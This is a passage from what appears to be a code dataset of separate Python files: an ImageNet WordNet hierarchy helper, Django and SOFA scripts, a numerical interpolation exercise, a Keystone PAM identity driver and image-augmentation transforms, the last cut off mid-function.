\n '''\n def __init__(self, ds_path, ds_info_path):\n \"\"\"\n Args:\n ds_path (str) : Path to ImageNet dataset\n ds_info_path (str) : Path to supplementary files for the ImageNet dataset \n ('wordnet.is_a.txt', 'words.txt' and 'imagenet_class_index.json')\n which can be obtained from http://image-net.org/download-API.\n\n \"\"\"\n self.tree = {}\n\n ret = self.load_imagenet_info(ds_path, ds_info_path)\n self.in_wnids, self.wnid_to_name, self.wnid_to_num, self.num_to_name = ret\n \n with open(os.path.join(ds_info_path, 'wordnet.is_a.txt'), 'r') as f:\n for line in f.readlines():\n parent_wnid, child_wnid = line.strip('\\n').split(' ')\n parentNode = self.get_node(parent_wnid)\n childNode = self.get_node(child_wnid)\n parentNode.add_child(childNode)\n \n for wnid in self.in_wnids:\n self.tree[wnid].descendant_count_in = 0\n self.tree[wnid].class_num = self.wnid_to_num[wnid]\n \n for wnid in self.in_wnids:\n node = self.tree[wnid]\n while node.parent_wnid is not None:\n self.tree[node.parent_wnid].descendant_count_in += 1\n self.tree[node.parent_wnid].descendants_all.update(node.descendants_all)\n self.tree[node.parent_wnid].descendants_all.add(node.wnid)\n node = self.tree[node.parent_wnid]\n \n del_nodes = [wnid for wnid in self.tree \\\n if (self.tree[wnid].descendant_count_in == 0 and self.tree[wnid].class_num == -1)]\n for d in del_nodes:\n self.tree.pop(d, None)\n \n assert all([k.descendant_count_in > 0 or k.class_num != -1 for k in self.tree.values()])\n\n self.wnid_sorted = sorted(sorted([(k, v.descendant_count_in, len(v.descendants_all)) \\\n for k, v in self.tree.items()\n ],\n key=lambda x: x[2], \n reverse=True\n ),\n key=lambda x: x[1], \n reverse=True\n )\n\n @staticmethod\n def load_imagenet_info(ds_path, ds_info_path):\n \"\"\"\n Get information about mapping between ImageNet wnids/class numbers/class names.\n\n Args:\n ds_path (str) : Path to ImageNet dataset\n ds_info_path (str) : Path to supplementary files for the ImageNet dataset \n ('wordnet.is_a.txt', 'words.txt', 'imagenet_class_index.json')\n which can be obtained from http://image-net.org/download-API.\n\n \"\"\"\n files = os.listdir(os.path.join(ds_path, 'train'))\n in_wnids = [f for f in files if f[0]=='n'] \n\n f = open(os.path.join(ds_info_path, 'words.txt'))\n wnid_to_name = [l.strip() for l in f.readlines()]\n wnid_to_name = {l.split('\\t')[0]: l.split('\\t')[1] \\\n for l in wnid_to_name}\n\n with open(os.path.join(ds_info_path, 'imagenet_class_index.json'), 'r') as f:\n base_map = json.load(f)\n wnid_to_num = {v[0]: int(k) for k, v in base_map.items()}\n num_to_name = {int(k): v[1] for k, v in base_map.items()}\n\n return in_wnids, wnid_to_name, wnid_to_num, num_to_name\n\n def get_node(self, wnid):\n \"\"\"\n Add node to tree.\n\n Args:\n wnid (str) : WordNet ID for synset represented by node\n\n Returns:\n A node object representing the specified wnid.\n \"\"\"\n if wnid not in self.tree:\n self.tree[wnid] = Node(wnid, name=self.wnid_to_name[wnid])\n return self.tree[wnid]\n\n\n def is_ancestor(self, ancestor_wnid, child_wnid):\n \"\"\"\n Check if a node is an ancestor of another.\n\n Args:\n ancestor_wnid (str) : WordNet ID for synset represented by ancestor node\n child_wnid (str) : WordNet ID for synset represented by child node\n\n Returns:\n A boolean variable indicating whether or not the node is an ancestor\n \"\"\"\n return (child_wnid in self.tree[ancestor_wnid].descendants_all)\n\n \n def get_descendants(self, node_wnid, in_imagenet=False):\n \"\"\"\n Get all descendants of a given node.\n\n 
Args:\n node_wnid (str) : WordNet ID for synset for node\n in_imagenet (bool) : If True, only considers descendants among \n ImageNet synsets, else considers all possible\n descendants in the WordNet hierarchy\n\n Returns:\n A set of wnids corresponding to all the descendants\n \"\"\" \n if in_imagenet:\n return set([self.wnid_to_num[ww] for ww in self.tree[node_wnid].descendants_all\n if ww in set(self.in_wnids)])\n else:\n return self.tree[node_wnid].descendants_all\n \n def get_superclasses(self, n_superclasses, \n ancestor_wnid=None, superclass_lowest=None, \n balanced=True):\n \"\"\"\n Get superclasses by grouping together classes from the ImageNet dataset.\n\n Args:\n n_superclasses (int) : Number of superclasses desired\n ancestor_wnid (str) : (optional) WordNet ID that can be used to specify\n common ancestor for the selected superclasses\n superclass_lowest (set of str) : (optional) Set of WordNet IDs of nodes\n that shouldn't be further sub-classes\n balanced (bool) : If True, all the superclasses will have the same number\n of ImageNet subclasses\n\n Returns:\n superclass_wnid (list): List of WordNet IDs of superclasses\n class_ranges (list of sets): List of ImageNet subclasses per superclass\n label_map (dict): Mapping from class number to human-interpretable description\n for each superclass\n \"\"\" \n \n assert superclass_lowest is None or \\\n not any([self.is_ancestor(s1, s2) for s1, s2 in product(superclass_lowest, superclass_lowest)])\n \n superclass_info = []\n for (wnid, ndesc_in, ndesc_all) in self.wnid_sorted:\n \n if len(superclass_info) == n_superclasses:\n break\n \n if ancestor_wnid is None or self.is_ancestor(ancestor_wnid, wnid):\n keep_wnid = [True] * (len(superclass_info) + 1)\n superclass_info.append((wnid, ndesc_in))\n \n for ii, (w, d) in enumerate(superclass_info):\n if self.is_ancestor(w, wnid):\n if superclass_lowest and w in superclass_lowest:\n keep_wnid[-1] = False\n else:\n keep_wnid[ii] = False\n \n for ii in range(len(superclass_info) - 1, -1, -1):\n if not keep_wnid[ii]:\n superclass_info.pop(ii)\n \n superclass_wnid = [w for w, _ in superclass_info]\n class_ranges, label_map = self.get_subclasses(superclass_wnid, \n balanced=balanced)\n \n return superclass_wnid, class_ranges, label_map\n\n\n def get_subclasses(self, superclass_wnid, balanced=True):\n \"\"\"\n Get ImageNet subclasses for a given set of superclasses from the WordNet \n hierarchy. \n\n Args:\n superclass_wnid (list): List of WordNet IDs of superclasses\n balanced (bool) : If True, all the superclasses will have the same number\n of ImageNet subclasses\n\n Returns:\n class_ranges (list of sets): List of ImageNet subclasses per superclass\n label_map (dict): Mapping from class number to human-interpretable description\n for each superclass\n \"\"\" \n ndesc_min = min([self.tree[w].descendant_count_in for w in superclass_wnid]) \n class_ranges, label_map = [], {}\n for ii, w in enumerate(superclass_wnid):\n descendants = self.get_descendants(w, in_imagenet=True)\n if balanced and len(descendants) > ndesc_min:\n descendants = set([dd for ii, dd in enumerate(sorted(list(descendants))) if ii < ndesc_min])\n class_ranges.append(descendants)\n label_map[ii] = self.tree[w].name\n \n for i in range(len(class_ranges)):\n for j in range(i + 1, len(class_ranges)):\n assert(len(class_ranges[i].intersection(class_ranges[j])) == 0)\n \n return class_ranges, label_map\n\ndef common_superclass_wnid(group_name):\n \"\"\"\n Get WordNet IDs of common superclasses. 
\n\n Args:\n group_name (str): Name of group\n\n Returns:\n superclass_wnid (list): List of WordNet IDs of superclasses\n \"\"\" \n common_groups = {\n\n # ancestor_wnid = 'n00004258'\n 'living_9': ['n02084071', #dog, domestic dog, Canis familiaris\n 'n01503061', # bird\n 'n01767661', # arthropod\n 'n01661091', # reptile, reptilian\n 'n02469914', # primate\n 'n02512053', # fish\n 'n02120997', # feline, felid\n 'n02401031', # bovid\n 'n01627424', # amphibian\n ],\n\n 'mixed_10': [\n 'n02084071', #dog,\n 'n01503061', #bird \n 'n02159955', #insect \n 'n02484322', #monkey \n 'n02958343', #car \n 'n02120997', #feline \n 'n04490091', #truck \n 'n13134947', #fruit \n 'n12992868', #fungus \n 'n02858304', #boat \n ],\n\n 'mixed_13': ['n02084071', #dog,\n 'n01503061', #bird (52)\n 'n02159955', #insect (27)\n 'n03405725', #furniture (21)\n 'n02512053', #fish (16),\n 'n02484322', #monkey (13)\n 'n02958343', #car (10)\n 'n02120997', #feline (8),\n 'n04490091', #truck (7)\n 'n13134947', #fruit (7)\n 'n12992868', #fungus (7)\n 'n02858304', #boat (6) \n 'n03082979', #computer(6)\n ],\n\n # Dataset from Geirhos et al., 2018: arXiv:1811.12231\n 'geirhos_16': ['n02686568', #aircraft (3)\n 'n02131653', #bear (3)\n 'n02834778', #bicycle (2)\n 'n01503061', #bird (52)\n 'n02858304', #boat (6)\n 'n02876657', #bottle (7)\n 'n02958343', #car (10)\n 'n02121808', #cat (5)\n 'n03001627', #char (4)\n 'n03046257', #clock (3)\n 'n02084071', #dog (116)\n 'n02503517', #elephant (2)\n 'n03614532', #keyboard (3)\n 'n03623556', #knife (2)\n 'n03862676', #oven (2)\n 'n04490091', #truck (7)\n ],\n 'big_12': ['n02084071', #dog (100+)\n 'n04341686', #structure (55)\n 'n01503061', #bird (52)\n 'n03051540', #clothing (48)\n 'n04576211', #wheeled vehicle\n 'n01661091', #reptile, reptilian (36)\n 'n02075296', #carnivore\n 'n02159955', #insect (27)\n 'n03800933', #musical instrument (26)\n 'n07555863', #food (24)\n 'n03405725', #furniture (21)\n 'n02469914', #primate (20)\n ],\n\t'mid_12': ['n02084071', #dog (100+)\n 'n01503061', #bird (52)\n 'n04576211', #wheeled vehicle\n 'n01661091', #reptile, reptilian (36)\n 'n02075296', #carnivore\n 'n02159955', #insect (27)\n 'n03800933', #musical instrument (26)\n 'n07555863', #food (24)\n 'n03419014', #garment (24)\n 'n03405725', #furniture (21)\n 'n02469914', #primate (20)\n 'n02512053', #fish (16)\n ]\n }\n\n if group_name in common_groups:\n superclass_wnid = common_groups[group_name]\n return superclass_wnid\n else:\n raise ValueError(\"Custom group does not exist\")\n\n"} {"ext": "py", "sha": "1a31263932a29b4ff86adc4d6d9bc6d8ae06de64", "content": "import Sofa\nimport sys\n\n\n\n\ndef createScene(rootNode):\n rootNode.createObject('PythonScriptController', filename=__file__, classname=\"AllocationTestController\")\n return rootNode\n\n\n\n\nclass AllocationTestController(Sofa.PythonScriptController):\n\n node = None\n subnode = None\n\n def onLoaded(self,node):\n self.node = node\n\n\n def add(self):\n # adding components in the scene, that increment a counter at each construction\n for i in xrange(10):\n self.node.createObject('PythonTestAllocationCounter')\n\n def remove(self):\n # removing all components, the destructor should be called, decrementing the counter\n for o in self.node.getObjects():\n self.node.removeObject(o)\n\n def addSub(self):\n # adding components in subnode, that increment a counter at each construction\n self.subnode = self.node.createChild('subnode')\n for i in xrange(10):\n self.subnode.createObject('PythonTestAllocationCounter')\n\n def removeSub(self):\n # 
removing subnode should remove all its components\n self.node.removeChild(self.subnode)\n self.subnode = None # this is mandatory not to keep any pointer on the python side\n\n def detachSub(self):\n self.subnode.detachFromGraph()\n self.subnode = None # this is mandatory not to keep any pointer on the python side"} {"ext": "py", "sha": "1a31268410de4ce6cdd92db7096e9f1ed022a5b7", "content": "#!/usr/bin/env python\n\"\"\"Django's command-line utility for administrative tasks.\"\"\"\nimport os\nimport sys\n\n\ndef main():\n \"\"\"Run administrative tasks.\"\"\"\n os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'product_catalog.settings')\n try:\n from django.core.management import execute_from_command_line\n except ImportError as exc:\n raise ImportError(\n \"Couldn't import Django. Are you sure it's installed and \"\n \"available on your PYTHONPATH environment variable? Did you \"\n \"forget to activate a virtual environment?\"\n ) from exc\n execute_from_command_line(sys.argv)\n\n\nif __name__ == '__main__':\n main()\n"} {"ext": "py", "sha": "1a3127916955bafed5ddcc1a0a682fe2be048bd0", "content": "import sys\nfrom pbsuite.utils.FileHandlers import FastqFile, M5File\nfrom pbsuite.jelly.Support import AlignmentConnector, SUPPORTFLAGS\n\n\"\"\"\nNeed to do work here\n\"\"\"\nif __name__ == '__main__':\n connector = AlignmentConnector()\n aligns = connector.parseAlignments(M5File(sys.argv[1]))\n\n reads = FastqFile(sys.argv[2])\n\n bestScore = None\n best = None\n fout = open(\"reads.fastq\",'w')\n spanCount = 0\n for readGroup in aligns:\n if readGroup[0].qname.startswith(\"ref\"):\n continue\n if len(readGroup) == 2:\n r1, r2 = readGroup\n a = connector.extendsTarget(r1)\n b = connector.extendsTarget(r2)\n if a != SUPPORTFLAGS.none and b != SUPPORTFLAGS.none:\n spanCount += 1\n print r1.qname, \"spans\"\n \n rStart = min(r1.qend, r2.qend)\n rEnd = max(r1.qstart, r2.qstart)\n t = reads[r1.qname].subSeq(rStart, rEnd)\n fout.write(str(t))\n gout = open(\"seed%d.fasta\" % spanCount, 'w')\n gout.write(\">%s\\n%s\\n\" % (t.name, t.seq))\n gout.close()\n if bestScore is None:\n bestScore = r1.score + r2.score\n best = reads[r1.qname].subSeq(rStart, rEnd)\n else:\n if (r1.score + r2.score) < bestScore:\n best = reads[r1.qname].subSeq(rStart, rEnd)\n else:\n a = readGroup[0]\n if a.tname.endswith('e5'):\n fout.write(str(reads[a.qname].subSeq(0, a.qstart)))\n elif a.tname.endswith('e3'):\n fout.write(str(reads[a.qname].subSeq(a.qend, a.qseqlength)))\n fout.close()\n print \"%d spans\" % spanCount\n fout = open(\"seed.fasta\",'w')\n fout.write(\">%s\\n%s\\n\" % (best.name, best.seq))\n fout.close()\n \n \n"} {"ext": "py", "sha": "1a3128972ac26439b859069f69b68f28340ea86b", "content": "from math import *\r\nfrom prettytable import PrettyTable\r\n\r\ndef func(x, y):\r\n return x * x + y * y\r\n\r\ndef main():\r\n mas_x = []; mas_y = []\r\n tmp_x = []; tmp_y = []; tmp_y2 = []\r\n tmp_x3 = []; tmp_y3 = []\r\n matrix = []\r\n \r\n beg = 0; end = 10\r\n N = abs(end - beg) - 1\r\n eps = 1e-5\r\n \r\n for i in range(beg, end):\r\n tmp_x.append(i)\r\n tmp_y.append(i)\r\n\r\n matrix = create_new_matrix(func, tmp_x, tmp_y)\r\n print_matrix(tmp_x, tmp_y, matrix)\r\n\r\n n_X = int(input(\"input n for X: \"))\r\n n_Y = int(input(\"input n for Y: \"))\r\n x = float(input(\"input x: \"))\r\n y = float(input(\"input y: \"))\r\n \r\n mas_x = create_new_x_y(x, n_X, N, tmp_x)\r\n mas_y = create_new_x_y(y, n_Y, N, tmp_y)\r\n matrix = create_new_matrix(func, mas_x, mas_y)\r\n\r\n new_x = []\r\n for i in range(len(mas_x)):\r\n 
new_x.append(interpolation(y, n_Y, mas_y, matrix[i]))\r\n \r\n answer = interpolation(x, n_X, mas_x, new_x)\r\n print(\"\\nF(x, y) = \", answer)\r\n \r\ndef print_matrix(tmp_x, tmp_y, matrix):\r\n print(\"|X|Y|\", end = \" \")\r\n for i in range(0, len(tmp_x)):\r\n print(\"{:5d}\".format(tmp_x[i]), end = \" \")\r\n print()\r\n for i in range(0, len(tmp_x)):\r\n print(\"{:3d}\".format(tmp_x[i]),\" \", end = \" \")\r\n for j in range(0, len(tmp_y)):\r\n print( \"{:5d}\".format(matrix[i][j]), end = \" \")\r\n print()\r\n print()\r\n \r\ndef create_new_matrix(f, tmp_x, tmp_y):\r\n matrix = []\r\n for i in range(0, len(tmp_x)):\r\n matrix.append([])\r\n for j in range(0, len(tmp_y)):\r\n matrix[i].append(f(tmp_x[i], tmp_y[j]))\r\n return matrix\r\n\r\ndef create_new_x_y(x, n, N, tmp_x):\r\n mas_x = []\r\n if (x <= tmp_x[0]):\r\n for i in range(0, n + 1):\r\n mas_x.append(tmp_x[i])\r\n elif (x >= tmp_x[N]):\r\n for i in range(len(tmp_x) - (n + 1), len(tmp_x)):\r\n mas_x.append(tmp_x[i])\r\n else:\r\n back = 0; up = 0\r\n for i in range(1, N):\r\n if((tmp_x[i - 1] <= x) and (tmp_x[i] > x)):\r\n up = i; back = i - 1\r\n for k in range(0, n + 1):\r\n if (k % 2 == 0):\r\n if (up < len(tmp_x)):\r\n mas_x.append(tmp_x[up])\r\n up += 1\r\n elif (back >= 0):\r\n mas_x.insert(0, tmp_x[back])\r\n back -= 1\r\n else:\r\n if (back >= 0):\r\n mas_x.insert(0, tmp_x[back])\r\n back -= 1\r\n elif(up < len(tmp_x)):\r\n mas_x.append(tmp_x[up])\r\n up += 1\r\n return mas_x\r\n\r\ndef interpolation(x, n, mas_x, mas_y):\r\n matrix = []\r\n matrix.append([])\r\n for i in range(0, n):\r\n matrix[0].append((mas_y[i] - mas_y[i + 1])/(mas_x[i] - mas_x[i + 1]))\r\n \r\n m = n - 1\r\n for i in range(1, n):\r\n matrix.append([])\r\n for j in range(0, m):\r\n matrix[i].append(((matrix[i - 1][j] - matrix[i - 1][j + 1]))/(mas_x[j] - mas_x[j + 2])) \r\n m -= 1\r\n\r\n y = mas_y[0]\r\n fact = 1\r\n for i in range(0, n):\r\n fact *= (x - mas_x[i])\r\n y += matrix[i][0] * fact\r\n return y\r\n\r\nif __name__ == \"__main__\":\r\n main();\r\n"} {"ext": "py", "sha": "1a312a27eaa0f5dcdf0b5e6df7c8fd74dbb94b86", "content": "# vim: tabstop=4 shiftwidth=4 softtabstop=4\n\n# Copyright 2012 OpenStack LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom __future__ import absolute_import\n\ntry:\n import pam\nexcept ImportError:\n pam = None\n import PAM\n\nfrom keystone import identity\n\n\ndef PAM_authenticate(username, password):\n def _pam_conv(auth, query_list):\n resp = []\n\n for query, q_type in query_list:\n if q_type in [PAM.PAM_PROMPT_ECHO_ON, PAM.PAM_PROMPT_ECHO_OFF]:\n resp.append((password, 0))\n elif q_type in [PAM.PAM_PROMPT_ERROR_MSG,\n PAM.PAM_PROMPT_TEXT_INFO]:\n resp.append(('', 0))\n\n return resp\n\n auth = PAM.pam()\n auth.start('passwd')\n auth.set_item(PAM.PAM_USER, username)\n auth.set_item(PAM.PAM_CONV, _pam_conv)\n\n try:\n auth.authenticate()\n auth.acct_mgmt()\n except PAM.error:\n raise AssertionError('Invalid user / password')\n\n return True\n\n\nclass PamIdentity(identity.Driver):\n \"\"\"Very basic identity based on PAM.\n\n Tenant is always the same as User, root user has admin role.\n \"\"\"\n\n def authenticate(self, user_id, tenant_id, password):\n auth = pam.authenticate if pam else PAM_authenticate\n if auth(user_id, password):\n metadata = {}\n if user_id == 'root':\n metadata['is_admin'] = True\n\n tenant = {'id': user_id, 'name': user_id}\n\n user = {'id': user_id, 'name': user_id}\n\n return (user, tenant, metadata)\n\n def get_project(self, tenant_id):\n return {'id': tenant_id, 'name': tenant_id}\n\n def get_project_by_name(self, tenant_name, domain_id):\n # TODO(henry-nash): Used domain_id once domains are implemented\n # in LDAP backend\n return {'id': tenant_name, 'name': tenant_name}\n\n def get_user(self, user_id):\n return {'id': user_id, 'name': user_id}\n\n def get_user_by_name(self, user_name, domain_id):\n # TODO(henry-nash): Used domain_id once domains are implemented\n # in LDAP backend\n return {'id': user_name, 'name': user_name}\n\n def get_role(self, role_id):\n raise NotImplementedError()\n\n def list_users(self):\n raise NotImplementedError()\n\n def list_roles(self):\n raise NotImplementedError()\n\n def add_user_to_project(self, tenant_id, user_id):\n pass\n\n def remove_user_from_project(self, tenant_id, user_id):\n pass\n\n def get_projects_for_user(self, user_id):\n return [user_id]\n\n def get_roles_for_user_and_project(self, user_id, tenant_id):\n raise NotImplementedError()\n\n def add_role_to_user_and_project(self, user_id, tenant_id, role_id):\n raise NotImplementedError()\n\n def remove_role_from_user_and_project(self, user_id, tenant_id, role_id):\n raise NotImplementedError()\n\n def create_user(self, user_id, user):\n raise NotImplementedError()\n\n def update_user(self, user_id, user):\n raise NotImplementedError()\n\n def delete_user(self, user_id):\n raise NotImplementedError()\n\n def create_project(self, tenant_id, tenant):\n raise NotImplementedError()\n\n def update_project(self, tenant_id, tenant):\n raise NotImplementedError()\n\n def delete_project(self, tenant_id, tenant):\n raise NotImplementedError()\n\n def get_metadata(self, user_id, tenant_id):\n metadata = {}\n if user_id == 'root':\n metadata['is_admin'] = True\n return metadata\n\n def create_metadata(self, user_id, tenant_id, metadata):\n raise NotImplementedError()\n\n def update_metadata(self, user_id, tenant_id, metadata):\n raise NotImplementedError()\n\n def create_role(self, role_id, role):\n raise NotImplementedError()\n\n def update_role(self, role_id, role):\n raise NotImplementedError()\n\n def delete_role(self, role_id):\n raise NotImplementedError()\n"} {"ext": "py", 
"sha": "1a312b6673a7488eb5e3b7368a7e25de24c8c521", "content": "import configparser\nimport os\nfrom compute.config import AlgorithmConfig\nimport numpy as np\n\nfrom train.utils import TrainConfig\n\n\nclass StatusUpdateTool(object):\n @classmethod\n def clear_config(cls):\n config_file = os.path.join(os.path.dirname(__file__), 'global.ini')\n config = configparser.ConfigParser()\n config.read(config_file)\n config.write(open(config_file, 'w'))\n\n @classmethod\n def __write_ini_file(cls, section, key, value):\n config_file = os.path.join(os.path.dirname(__file__), 'global.ini')\n config = configparser.ConfigParser()\n config.read(config_file)\n config.set(section, key, value)\n config.write(open(config_file, 'w'))\n\n @classmethod\n def __read_ini_file(cls, section, key):\n config_file = os.path.join(os.path.dirname(__file__), 'global.ini')\n config = configparser.ConfigParser()\n config.read(config_file)\n return config.get(section, key)\n\n @classmethod\n def get_num_class(cls):\n return TrainConfig.get_out_cls_num()\n\n @classmethod\n def get_input_weight(cls):\n rs = TrainConfig.get_data_input_size()\n return rs[0]\n\n @classmethod\n def get_input_height(cls):\n rs = TrainConfig.get_data_input_size()\n return rs[1]\n\n @classmethod\n def get_input_channel(cls):\n rs = TrainConfig.get_data_input_size()\n return rs[2]\n\n @classmethod\n def get_init_params(cls):\n g = AlgorithmConfig()\n pop_size = int(g.read_ini_file('pop_size'))\n max_gen = int(g.read_ini_file('max_gen'))\n params = {}\n params['pop_size'] = pop_size\n params['max_gen'] = max_gen\n return params\n\n @classmethod\n def begin_evolution(cls):\n section = 'evolution_status'\n key = 'IS_RUNNING'\n cls.__write_ini_file(section, key, \"1\")\n\n @classmethod\n def end_evolution(cls):\n section = 'evolution_status'\n key = 'IS_RUNNING'\n cls.__write_ini_file(section, key, \"0\")\n\n @classmethod\n def is_evolution_running(cls):\n rs = cls.__read_ini_file('evolution_status', 'IS_RUNNING')\n if rs == '1':\n return True\n else:\n return False\n\n"} {"ext": "py", "sha": "1a312c1d48f208b3f96681ebd098e5fa3d2b98c4", "content": "#!/usr/bin/env python\r\n\"\"\"Django's command-line utility for administrative tasks.\"\"\"\r\nimport os\r\nimport sys\r\n\r\n\r\ndef main():\r\n \"\"\"Run administrative tasks.\"\"\"\r\n os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'buttonpython.settings')\r\n try:\r\n from django.core.management import execute_from_command_line\r\n except ImportError as exc:\r\n raise ImportError(\r\n \"Couldn't import Django. Are you sure it's installed and \"\r\n \"available on your PYTHONPATH environment variable? Did you \"\r\n \"forget to activate a virtual environment?\"\r\n ) from exc\r\n execute_from_command_line(sys.argv)\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n"} {"ext": "py", "sha": "1a312c35f581b6098df5839f4d1517eba53dae60", "content": "import cv2\nimport random\nimport numpy as np\nimport skimage.transform\n\nfrom typing import Union, Optional, Sequence, Tuple, Dict\n\nfrom . import functional as F\nfrom ...core.transforms_interface import DualTransform, to_tuple\n\n__all__ = [\"ShiftScaleRotate\", \"ElasticTransform\", \"Perspective\", \"Affine\", \"PiecewiseAffine\"]\n\n\nclass ShiftScaleRotate(DualTransform):\n \"\"\"Randomly apply affine transforms: translate, scale and rotate the input.\n\n Args:\n shift_limit ((float, float) or float): shift factor range for both height and width. If shift_limit\n is a single float value, the range will be (-shift_limit, shift_limit). 
Absolute values for lower and\n upper bounds should lie in range [0, 1]. Default: (-0.0625, 0.0625).\n scale_limit ((float, float) or float): scaling factor range. If scale_limit is a single float value, the\n range will be (-scale_limit, scale_limit). Default: (-0.1, 0.1).\n rotate_limit ((int, int) or int): rotation range. If rotate_limit is a single int value, the\n range will be (-rotate_limit, rotate_limit). Default: (-45, 45).\n interpolation (OpenCV flag): flag that is used to specify the interpolation algorithm. Should be one of:\n cv2.INTER_NEAREST, cv2.INTER_LINEAR, cv2.INTER_CUBIC, cv2.INTER_AREA, cv2.INTER_LANCZOS4.\n Default: cv2.INTER_LINEAR.\n border_mode (OpenCV flag): flag that is used to specify the pixel extrapolation method. Should be one of:\n cv2.BORDER_CONSTANT, cv2.BORDER_REPLICATE, cv2.BORDER_REFLECT, cv2.BORDER_WRAP, cv2.BORDER_REFLECT_101.\n Default: cv2.BORDER_REFLECT_101\n value (int, float, list of int, list of float): padding value if border_mode is cv2.BORDER_CONSTANT.\n mask_value (int, float,\n list of int,\n list of float): padding value if border_mode is cv2.BORDER_CONSTANT applied for masks.\n shift_limit_x ((float, float) or float): shift factor range for width. If it is set then this value\n instead of shift_limit will be used for shifting width. If shift_limit_x is a single float value,\n the range will be (-shift_limit_x, shift_limit_x). Absolute values for lower and upper bounds should lie in\n the range [0, 1]. Default: None.\n shift_limit_y ((float, float) or float): shift factor range for height. If it is set then this value\n instead of shift_limit will be used for shifting height. If shift_limit_y is a single float value,\n the range will be (-shift_limit_y, shift_limit_y). Absolute values for lower and upper bounds should lie\n in the range [0, 1]. Default: None.\n p (float): probability of applying the transform. 
Default: 0.5.\n\n Targets:\n image, mask, keypoints\n\n Image types:\n uint8, float32\n \"\"\"\n\n def __init__(\n self,\n shift_limit=0.0625,\n scale_limit=0.1,\n rotate_limit=45,\n interpolation=cv2.INTER_LINEAR,\n border_mode=cv2.BORDER_REFLECT_101,\n value=None,\n mask_value=None,\n shift_limit_x=None,\n shift_limit_y=None,\n always_apply=False,\n p=0.5,\n ):\n super(ShiftScaleRotate, self).__init__(always_apply, p)\n self.shift_limit_x = to_tuple(shift_limit_x if shift_limit_x is not None else shift_limit)\n self.shift_limit_y = to_tuple(shift_limit_y if shift_limit_y is not None else shift_limit)\n self.scale_limit = to_tuple(scale_limit, bias=1.0)\n self.rotate_limit = to_tuple(rotate_limit)\n self.interpolation = interpolation\n self.border_mode = border_mode\n self.value = value\n self.mask_value = mask_value\n\n def apply(self, img, angle=0, scale=0, dx=0, dy=0, interpolation=cv2.INTER_LINEAR, **params):\n return F.shift_scale_rotate(img, angle, scale, dx, dy, interpolation, self.border_mode, self.value)\n\n def apply_to_mask(self, img, angle=0, scale=0, dx=0, dy=0, **params):\n return F.shift_scale_rotate(img, angle, scale, dx, dy, cv2.INTER_NEAREST, self.border_mode, self.mask_value)\n\n def apply_to_keypoint(self, keypoint, angle=0, scale=0, dx=0, dy=0, rows=0, cols=0, **params):\n return F.keypoint_shift_scale_rotate(keypoint, angle, scale, dx, dy, rows, cols)\n\n def get_params(self):\n return {\n \"angle\": random.uniform(self.rotate_limit[0], self.rotate_limit[1]),\n \"scale\": random.uniform(self.scale_limit[0], self.scale_limit[1]),\n \"dx\": random.uniform(self.shift_limit_x[0], self.shift_limit_x[1]),\n \"dy\": random.uniform(self.shift_limit_y[0], self.shift_limit_y[1]),\n }\n\n def apply_to_bbox(self, bbox, angle, scale, dx, dy, **params):\n return F.bbox_shift_scale_rotate(bbox, angle, scale, dx, dy, **params)\n\n def get_transform_init_args(self):\n return {\n \"shift_limit_x\": self.shift_limit_x,\n \"shift_limit_y\": self.shift_limit_y,\n \"scale_limit\": to_tuple(self.scale_limit, bias=-1.0),\n \"rotate_limit\": self.rotate_limit,\n \"interpolation\": self.interpolation,\n \"border_mode\": self.border_mode,\n \"value\": self.value,\n \"mask_value\": self.mask_value,\n }\n\n\nclass ElasticTransform(DualTransform):\n \"\"\"Elastic deformation of images as described in [Simard2003]_ (with modifications).\n Based on https://gist.github.com/ernestum/601cdf56d2b424757de5\n\n .. [Simard2003] Simard, Steinkraus and Platt, \"Best Practices for\n Convolutional Neural Networks applied to Visual Document Analysis\", in\n Proc. of the International Conference on Document Analysis and\n Recognition, 2003.\n\n Args:\n alpha (float):\n sigma (float): Gaussian filter parameter.\n alpha_affine (float): The range will be (-alpha_affine, alpha_affine)\n interpolation (OpenCV flag): flag that is used to specify the interpolation algorithm. Should be one of:\n cv2.INTER_NEAREST, cv2.INTER_LINEAR, cv2.INTER_CUBIC, cv2.INTER_AREA, cv2.INTER_LANCZOS4.\n Default: cv2.INTER_LINEAR.\n border_mode (OpenCV flag): flag that is used to specify the pixel extrapolation method. 
Should be one of:\n cv2.BORDER_CONSTANT, cv2.BORDER_REPLICATE, cv2.BORDER_REFLECT, cv2.BORDER_WRAP, cv2.BORDER_REFLECT_101.\n Default: cv2.BORDER_REFLECT_101\n value (int, float, list of ints, list of float): padding value if border_mode is cv2.BORDER_CONSTANT.\n mask_value (int, float,\n list of ints,\n list of float): padding value if border_mode is cv2.BORDER_CONSTANT applied for masks.\n approximate (boolean): Whether to smooth displacement map with fixed kernel size.\n Enabling this option gives ~2X speedup on large images.\n same_dxdy (boolean): Whether to use same random generated shift for x and y.\n Enabling this option gives ~2X speedup.\n\n Targets:\n image, mask\n\n Image types:\n uint8, float32\n \"\"\"\n\n def __init__(\n self,\n alpha=1,\n sigma=50,\n alpha_affine=50,\n interpolation=cv2.INTER_LINEAR,\n border_mode=cv2.BORDER_REFLECT_101,\n value=None,\n mask_value=None,\n always_apply=False,\n approximate=False,\n same_dxdy=False,\n p=0.5,\n ):\n super(ElasticTransform, self).__init__(always_apply, p)\n self.alpha = alpha\n self.alpha_affine = alpha_affine\n self.sigma = sigma\n self.interpolation = interpolation\n self.border_mode = border_mode\n self.value = value\n self.mask_value = mask_value\n self.approximate = approximate\n self.same_dxdy = same_dxdy\n\n def apply(self, img, random_state=None, interpolation=cv2.INTER_LINEAR, **params):\n return F.elastic_transform(\n img,\n self.alpha,\n self.sigma,\n self.alpha_affine,\n interpolation,\n self.border_mode,\n self.value,\n np.random.RandomState(random_state),\n self.approximate,\n self.same_dxdy,\n )\n\n def apply_to_mask(self, img, random_state=None, **params):\n return F.elastic_transform(\n img,\n self.alpha,\n self.sigma,\n self.alpha_affine,\n cv2.INTER_NEAREST,\n self.border_mode,\n self.mask_value,\n np.random.RandomState(random_state),\n 